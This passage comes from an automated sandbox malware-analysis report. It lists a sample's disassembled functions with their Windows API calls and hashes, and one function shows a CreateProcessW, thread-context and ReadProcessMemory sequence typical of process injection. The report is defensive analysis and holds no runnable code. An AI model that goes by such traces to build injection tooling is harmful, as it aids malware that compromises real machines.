                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    • Opcode ID: 059f14fe6c57c3fd580135dd1a608b39b093940748adec6cff0ad2f1f0e2edaf
                    • Instruction ID: 71722d57e8eec9ed6dcd6df4fc01a5a750d1a695ac23d540aca05c8c559dbecc
                    • Opcode Fuzzy Hash: 059f14fe6c57c3fd580135dd1a608b39b093940748adec6cff0ad2f1f0e2edaf
                    • Instruction Fuzzy Hash: 513184B05057019FD720EF64D88479BBBE5FB49304F004A2EF59A83350EBB5A948CB96
                    Function 006A594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 006A5963
                      • Part of subcall function 006AA3AB: __NMSG_WRITE.LIBCMT ref: 006AA3D2
                      • Part of subcall function 006AA3AB: __NMSG_WRITE.LIBCMT ref: 006AA3DC
                    • __NMSG_WRITE.LIBCMT ref: 006A596A
                      • Part of subcall function 006AA408: GetModuleFileNameW.KERNEL32(00000000,007443BA,00000104,?,00000001,00000000), ref: 006AA49A
                      • Part of subcall function 006AA408: ___crtMessageBoxW.LIBCMT ref: 006AA548
                      • Part of subcall function 006A32DF: ___crtCorExitProcess.LIBCMT ref: 006A32E5
                      • Part of subcall function 006A32DF: ExitProcess.KERNEL32 ref: 006A32EE
                      • Part of subcall function 006A8D68: __getptd_noexit.LIBCMT ref: 006A8D68
                    • RtlAllocateHeap.NTDLL(00CC0000,00000000,00000001,00000000,?,?,?,006A1013,?), ref: 006A598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: a3384aad99f8d8cb47f05a92da1037398f8b527a33c041fc57e8a690fb46f839
                    • Instruction ID: 748bc32df6af6e5238d74288cb7993b23bba3250303841e7740633e46fba7e7e
                    • Opcode Fuzzy Hash: a3384aad99f8d8cb47f05a92da1037398f8b527a33c041fc57e8a690fb46f839
                    • Instruction Fuzzy Hash: 6601D235200B55DEE661BB64E842BAF729B9F43770F10002FF502AF282DF749D019E69
                    Function 006E9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,006E97D2,?,?,?,?,?,00000004), ref: 006E9B45
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,006E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006E9B5B
                    • CloseHandle.KERNEL32(00000000,?,006E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006E9B62
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: 16db5a3c60e8a466cdaa027b75911e26bdd70c0790814ef229a6cfd293f4d8c4
                    • Instruction ID: 918a5b3a9b5315380a064aa815af365148be01c072725824d3b2f5ef05cefb10
                    • Opcode Fuzzy Hash: 16db5a3c60e8a466cdaa027b75911e26bdd70c0790814ef229a6cfd293f4d8c4
                    • Instruction Fuzzy Hash: C7E08632181318F7D7311B54EC09FCA7F19AB05B71F108220FB14690E08BB52511979C
                    Function 006E8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 006E8FA5
                      • Part of subcall function 006A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,006A9C64), ref: 006A2FA9
                      • Part of subcall function 006A2F95: GetLastError.KERNEL32(00000000,?,006A9C64), ref: 006A2FBB
                    • _free.LIBCMT ref: 006E8FB6
                    • _free.LIBCMT ref: 006E8FC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 7ae2d2e3dd28ae231ba4dfbfc9ff98cbdd3434907fe9d12881c55d2a38818b0b
                    • Instruction ID: f700886ff926444fbe831bed5dd9dafa298908e4d6579441592b90de3ff44311
                    • Opcode Fuzzy Hash: 7ae2d2e3dd28ae231ba4dfbfc9ff98cbdd3434907fe9d12881c55d2a38818b0b
                    • Instruction Fuzzy Hash: 8FE012A174A7424ECA64B97DAD50AD357EF5F49390718081DB40DDB242DE24EC51852C
                    Function 0068AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    • Opcode ID: 50c551e167550c9585c3aecc6143546be3185b01cf1b65bc1581806c3adc2757
                    • Instruction ID: 4849a1d0197965e9fffad8a35c2f5f692bee955578f74eb8ad86a6973c2f97e5
                    • Opcode Fuzzy Hash: 50c551e167550c9585c3aecc6143546be3185b01cf1b65bc1581806c3adc2757
                    • Instruction Fuzzy Hash: 80224774508241CFDB24EF54C494B6ABBE2FF85300F158A5EE8968B362D771EC81CB86
                    Function 00687BB1 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 888ce228c65e5e126e2c0d83d6bef63a0f4650b727a1fb86e52d4496ebb79edc
                    • Instruction ID: 7a2d44adb79ed36bc66b8c741f0d61a17ea375a54e65a4f577cdefa1a57877b7
                    • Opcode Fuzzy Hash: 888ce228c65e5e126e2c0d83d6bef63a0f4650b727a1fb86e52d4496ebb79edc
                    • Instruction Fuzzy Hash: 0131C2B1604506AFC714EF28D8D1EA9B3AAFF49310725872DE919CB391DB70EC60CB90
                    Function 0068492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    • IsThemeActive.UXTHEME ref: 00684992
                      • Part of subcall function 006A35AC: __lock.LIBCMT ref: 006A35B2
                      • Part of subcall function 006A35AC: DecodePointer.KERNEL32(00000001,?,006849A7,006D81BC), ref: 006A35BE
                      • Part of subcall function 006A35AC: EncodePointer.KERNEL32(?,?,006849A7,006D81BC), ref: 006A35C9
                      • Part of subcall function 00684A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00684A73
                      • Part of subcall function 00684A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00684A88
                      • Part of subcall function 00683B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00683B7A
                      • Part of subcall function 00683B4C: IsDebuggerPresent.KERNEL32 ref: 00683B8C
                      • Part of subcall function 00683B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,007462F8,007462E0,?,?), ref: 00683BFD
                      • Part of subcall function 00683B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00683C81
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006849D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                    • String ID:
                    • API String ID: 1438897964-0
                    • Opcode ID: 8ff0c1febe0f299465503b65c413a2710b17e61cf98c9b692703a4d8e3d34cc8
                    • Instruction ID: f21f6ae45d3c7e9bf8be635cd20d0c45b3fb9cfc87501f5d6c37fec84ad3ef61
                    • Opcode Fuzzy Hash: 8ff0c1febe0f299465503b65c413a2710b17e61cf98c9b692703a4d8e3d34cc8
                    • Instruction Fuzzy Hash: BE11CD71908311AFC710EF69EC4591AFBE9FB9A710F00861FF041832B1DBB49948CB9A
                    Function 006A0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006A594C: __FF_MSGBANNER.LIBCMT ref: 006A5963
                      • Part of subcall function 006A594C: __NMSG_WRITE.LIBCMT ref: 006A596A
                      • Part of subcall function 006A594C: RtlAllocateHeap.NTDLL(00CC0000,00000000,00000001,00000000,?,?,?,006A1013,?), ref: 006A598F
                    • std::exception::exception.LIBCMT ref: 006A102C
                    • __CxxThrowException@8.LIBCMT ref: 006A1041
                      • Part of subcall function 006A87DB: RaiseException.KERNEL32(?,?,?,0073BAF8,00000000,?,?,?,?,006A1046,?,0073BAF8,?,00000001), ref: 006A8830
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID:
                    • API String ID: 3902256705-0
                    • Opcode ID: dbb0583fc9627dfaeb99b9d3724b0fcf186f204d1c0fbc16384ae2ebb1425a26
                    • Instruction ID: 4f494d59f613f37fd884b3a36f556a3d883767adbc9d02e4138423ca99c113d4
                    • Opcode Fuzzy Hash: dbb0583fc9627dfaeb99b9d3724b0fcf186f204d1c0fbc16384ae2ebb1425a26
                    • Instruction Fuzzy Hash: 68F0F93450021DA6DB20BA58EC019DF77AE9F03350F200029F80496292DFB08ED18AA4
                    Function 006A582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: a46738ce6305c0be715eff8d4a5462043fb9809ed35c46c148c553ab1b7151a7
                    • Instruction ID: 69023b31d5db6c7b68bd52eb4d04c7d329185b848f2098d15487c07efd346652
                    • Opcode Fuzzy Hash: a46738ce6305c0be715eff8d4a5462043fb9809ed35c46c148c553ab1b7151a7
                    • Instruction Fuzzy Hash: 0D01B171C00619EBCF62FF698C0148E7A63AF82760F044219F8141B2A1DB358E21DF95
                    Function 006A55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006A8D68: __getptd_noexit.LIBCMT ref: 006A8D68
                    • __lock_file.LIBCMT ref: 006A561B
                      • Part of subcall function 006A6E4E: __lock.LIBCMT ref: 006A6E71
                    • __fclose_nolock.LIBCMT ref: 006A5626
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: 60a72c0a99ee8c95f3caf05a6389ebc3cab34b59624f65f6b41cb10538e6a1a6
                    • Instruction ID: 2215f1a480e2ba2451cc1fc99f5ad0b4dac9800aad82b0d31b926a7082ffd4ee
                    • Opcode Fuzzy Hash: 60a72c0a99ee8c95f3caf05a6389ebc3cab34b59624f65f6b41cb10538e6a1a6
                    • Instruction Fuzzy Hash: 1EF09071800A059ED7A0FF75880276E76A36F43334F55820EE416AB1D1CF7C8D029F69
                    Function 0368129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03681A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03681AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03681B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1674262971.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction ID: db6ebe1e75d616c1e9c9dec96c323a6504727d2e886c148b9c96fd9b77e44fd5
                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction Fuzzy Hash: 2712CD24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A
                    Function 0068766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: aea015fc25c13e8fd003b555b5af24a91a2a2ce73aa8bcaa270962dbfb21779d
                    • Instruction ID: 311a9fd89d5efb0aced6474a126f4a1e9fb94442b5c047f382dbea9d84cedfc1
                    • Opcode Fuzzy Hash: aea015fc25c13e8fd003b555b5af24a91a2a2ce73aa8bcaa270962dbfb21779d
                    • Instruction Fuzzy Hash: 0531B679208A02DFD724AF18D490961F7A6FF49310724C66DE9498B765E730DC81DB54
                    Function 006C00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: ed17daadff39e4f7d96a2c581c34c873251841480592108cfe94e042834737b7
                    • Instruction ID: ed06ad4fdbfef65d97b43f9854f54596ca150062096e2fc40469d9388f8062ef
                    • Opcode Fuzzy Hash: ed17daadff39e4f7d96a2c581c34c873251841480592108cfe94e042834737b7
                    • Instruction Fuzzy Hash: 8B412574504341CFEB24DF54C484B5ABBE2BF45308F0989ADE8998B762C772EC85CB56
                    Function 00687CB3 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 23147eae25e27b783aec34926c4dadc18396a5ae383f2bb8c3f8d8f8a84b3ac2
                    • Instruction ID: 8a1cb42dfdf99b8f6ea12b91c6b6540faf1539bb777dd23294ad0dc274d57830
                    • Opcode Fuzzy Hash: 23147eae25e27b783aec34926c4dadc18396a5ae383f2bb8c3f8d8f8a84b3ac2
                    • Instruction Fuzzy Hash: B22121B1604A09EBEB106F25EC427A97BB6FF14351F31C56EE486C51A1EB30D5E08709
                    Function 00684F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00684D13: FreeLibrary.KERNEL32(00000000,?), ref: 00684D4D
                      • Part of subcall function 006A548B: __wfsopen.LIBCMT ref: 006A5496
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00684F6F
                      • Part of subcall function 00684CC8: FreeLibrary.KERNEL32(00000000), ref: 00684D02
                      • Part of subcall function 00684DD0: _memmove.LIBCMT ref: 00684E1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    • Opcode ID: 75f2a81de3dc20ab6a61a0242c3385e4cb861c8f06a3a754f6437ccc4ecb71a2
                    • Instruction ID: 61709c2a4d317b159fc8543de97c180a5f714679029080f9488a0c1d00e3a996
                    • Opcode Fuzzy Hash: 75f2a81de3dc20ab6a61a0242c3385e4cb861c8f06a3a754f6437ccc4ecb71a2
                    • Instruction Fuzzy Hash: 6A110A31600306ABCB50FF70CC12FAE77EB9F84704F10862DF542A62C1DE759A059BA4
                    Function 006C01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 5f242a41f9ff6362ebb8a85a0ddba463d9c623a2ce5678cdfb2ccb68a3d911d3
                    • Instruction ID: 786f06edd5e0aa00710a3aec95bbd6f8e04a29c4088214f4c779f55c95edcb50
                    • Opcode Fuzzy Hash: 5f242a41f9ff6362ebb8a85a0ddba463d9c623a2ce5678cdfb2ccb68a3d911d3
                    • Instruction Fuzzy Hash: 412144B4508341CFDB24EF54C448B5ABBE2BF85304F058A6DE89A4B721D771E845CF56
                    Function 006DDC20 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006D7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?,?,006D799D), ref: 006D766F
                      • Part of subcall function 006D7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?), ref: 006D768A
                      • Part of subcall function 006D7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?), ref: 006D7698
                      • Part of subcall function 006D7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?), ref: 006D76A8
                    • IIDFromString.OLE32(00000000,?,?,?,006DDAA9,?,?,?,?,?,?,?,?,?), ref: 006DDC57
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    • Opcode ID: 75dacb53bc530cc134b4110ce129e88b279356e3e0b75f002209c037d32267da
                    • Instruction ID: 999e15ac6819e51c9e310727cbf36a833058f9744fca0deb355c149de681e85d
                    • Opcode Fuzzy Hash: 75dacb53bc530cc134b4110ce129e88b279356e3e0b75f002209c037d32267da
                    • Instruction Fuzzy Hash: 54F04975A40605EBCB00EF09D880AA67B5EAB05360F10C126ED08CE256D3F1E940DBA4
                    Function 006A4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                    • __lock_file.LIBCMT ref: 006A4AD6
                      • Part of subcall function 006A8D68: __getptd_noexit.LIBCMT ref: 006A8D68
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
